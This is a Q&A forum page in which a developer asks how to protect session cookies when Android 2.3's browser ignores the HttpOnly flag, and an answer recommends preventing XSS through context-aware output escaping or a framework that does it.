I’m going to be building my first mobile web app, and I found out that Android 2.3’s browser doesn’t implement httponly.
What are some techniques to mitigate this problem? Is this a lost cause?
Share
Sign Up to our social questions and Answers Engine to ask questions, answer people’s questions, and connect with other people.
Login to our social questions & Answers Engine to ask questions answer people’s questions & connect with other people.
Lost your password? Please enter your email address. You will receive a link and will create a new password via email.
Please briefly explain why you feel this question should be reported.
Please briefly explain why you feel this answer should be reported.
Please briefly explain why you feel this user should be reported.
I’m going to be building my first mobile web app, and I found out that Android 2.3’s browser doesn’t implement httponly.
What are some techniques to mitigate this problem? Is this a lost cause?
Purpose of the HttpOnly flag is to limit damage in case of Cross-Site Scripting (XSS) vulnerabilities in the web application by disallowing JavaScript to access the session cookie. If your web application is written properly in the first place, that is, if it is not vulnerable against XSS, you don’t strictly need the HttpOnly flag to be secure from (XSS based) session hijacking. HttpOnly is only a second line of defense.
So effectively, if you cannot use the HttpOnly flag due to client restrictions, you should make sure to escape all dynamic data properly when including it in HTML, JS, CSS, JSON or whatever format(s) you generate, using the appropriate escaping rules depending on context, to prevent XSS. Or use a framework which does this for you.